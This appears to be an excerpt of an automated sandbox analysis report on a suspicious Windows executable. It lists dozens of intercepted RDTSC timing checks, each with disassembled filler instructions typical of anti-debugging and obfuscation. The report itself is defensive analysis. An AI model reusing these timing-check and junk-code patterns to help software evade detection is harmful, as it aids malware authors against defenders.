Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13DB964 second address: 13DB980 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCB4545A1B6h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13DB980 second address: 13DB98D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCB44FB4548h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13DB98D second address: 13DB9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b je 00007FCB4545A1A6h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FCB4545A1B0h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13DB9B1 second address: 13DB9C6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FCB44FB4546h 0x0000000d jbe 00007FCB44FB4546h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13DB9C6 second address: 13DB9CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13DFEA6 second address: 13DFEC6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FCB44FB4558h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13DFEC6 second address: 13DFEE4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FCB4545A1B6h 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E0416 second address: 13E0422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FCB44FB4546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E0422 second address: 13E0437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FCB4545A1A6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E0437 second address: 13E0462 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FCB44FB4552h 0x0000000d jno 00007FCB44FB454Eh 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E08A8 second address: 13E08C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCB4545A1B1h 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E08C2 second address: 13E08CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E0F46 second address: 13E0F63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E0F63 second address: 13E0F72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB454Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E6302 second address: 13E6306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E65CE second address: 13E65E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FCB44FB4550h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E65E6 second address: 13E65EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E68EF second address: 13E6905 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007FCB44FB4546h 0x00000009 jbe 00007FCB44FB4546h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E6D49 second address: 13E6D6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E6D6C second address: 13E6D70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E6D70 second address: 13E6D76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E700C second address: 13E7012 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E7012 second address: 13E7019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E7019 second address: 13E701E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E701E second address: 13E704C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FCB4545A1B5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007FCB4545A1A6h 0x0000001c push edx 0x0000001d pop edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E704C second address: 13E7054 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E7054 second address: 13E705A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E705A second address: 13E705E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E705E second address: 13E7062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E7062 second address: 13E707E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCB44FB4546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCB44FB454Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13E707E second address: 13E7082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13EEB81 second address: 13EEB89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13EEB89 second address: 13EEB9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1AEh 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1366349 second address: 136634D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 136634D second address: 136639B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCB4545A1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FCB4545A1B0h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 jmp 00007FCB4545A1B5h 0x00000018 push eax 0x00000019 push edx 0x0000001a push edx 0x0000001b pop edx 0x0000001c jmp 00007FCB4545A1B7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 136639B second address: 136639F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B2ABE second address: 13B2AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B30DF second address: 13B30E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B30E3 second address: 13B30E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B3236 second address: 13B3255 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB4553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007FCB44FB4546h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B3255 second address: 13B3291 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCB4545A1A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007FCB4545A1B0h 0x00000012 push eax 0x00000013 jng 00007FCB4545A1A6h 0x00000019 pop eax 0x0000001a popad 0x0000001b xchg eax, esi 0x0000001c mov edi, dword ptr [ebp+122D29BDh] 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 jp 00007FCB4545A1ACh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B3945 second address: 13B3949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B3BBE second address: 13B3BF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB4545A1B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d mov ecx, ebx 0x0000000f lea eax, dword ptr [ebp+1248688Ah] 0x00000015 mov ecx, dword ptr [ebp+122D354Ch] 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e jng 00007FCB4545A1ACh 0x00000024 jp 00007FCB4545A1A6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B3BF3 second address: 13B3BFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B3BFA second address: 13B3C75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FCB4545A1B0h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007FCB4545A1A8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000015h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D188Ch], edx 0x0000002e mov edi, dword ptr [ebp+122D3774h] 0x00000034 lea eax, dword ptr [ebp+12486846h] 0x0000003a push 00000000h 0x0000003c push edx 0x0000003d call 00007FCB4545A1A8h 0x00000042 pop edx 0x00000043 mov dword ptr [esp+04h], edx 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc edx 0x00000050 push edx 0x00000051 ret 0x00000052 pop edx 0x00000053 ret 0x00000054 mov dx, ax 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007FCB4545A1ADh 0x0000005f rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13EDEB4 second address: 13EDEC0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13EDEC0 second address: 13EDEC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13EDEC4 second address: 13EDED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FCB44FB4548h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13EDED9 second address: 13EDEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCB4545A1ABh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13EDEEC second address: 13EDEF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FCB44FB4546h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13EE17C second address: 13EE182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13EE5E9 second address: 13EE5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13EE5ED second address: 13EE5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13EE5F3 second address: 13EE5FE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 ja 00007FCB44FB4546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13F3443 second address: 13F3469 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCB4545A1ACh 0x0000000d jmp 00007FCB4545A1B2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13F3469 second address: 13F346F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13F35B0 second address: 13F35B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13F35B6 second address: 13F35BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13F3B33 second address: 13F3B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13F3B3C second address: 13F3B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13F3F02 second address: 13F3F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13F3F06 second address: 13F3F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jng 00007FCB44FB4546h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13F3F15 second address: 13F3F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FCB4545A1ADh 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 jmp 00007FCB4545A1ACh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13F3F3A second address: 13F3F55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCB44FB4557h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13F7F10 second address: 13F7F29 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FCB4545A1B2h 0x00000008 pop edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13FA948 second address: 13FA954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007FCB44FB4546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13FAAF9 second address: 13FAB36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCB4545A1B4h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FCB4545A1ADh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FCB4545A1A6h 0x00000018 jmp 00007FCB4545A1AEh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13FD7DE second address: 13FD819 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB454Ah 0x00000007 jmp 00007FCB44FB4558h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007FCB44FB4555h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13FD819 second address: 13FD821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1401518 second address: 140151C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 140151C second address: 1401522 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14017C0 second address: 14017D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCB44FB4550h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1401AEC second address: 1401AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jp 00007FCB4545A1C6h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1406AF8 second address: 1406AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1406AFC second address: 1406B00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1406B00 second address: 1406B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCB44FB4556h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1405E74 second address: 1405E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007FCB4545A1C0h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1405FE8 second address: 1405FEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1406154 second address: 1406165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FCB4545A1A6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 14062C8 second address: 14062CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 140641D second address: 1406427 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FCB4545A1A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1406427 second address: 140642B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 1406590 second address: 14065A8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FCB4545A1AFh 0x0000000a pop ecx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 140C8B2 second address: 140C8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 140C8B8 second address: 140C8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 140C8BC second address: 140C8D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCB44FB4557h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 140B720 second address: 140B724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 140B724 second address: 140B743 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FCB44FB454Dh 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jng 00007FCB44FB4546h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\zUKf62kgkm.exe RDTSC instruction interceptor: First address: 13B373B second address: 13B3740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
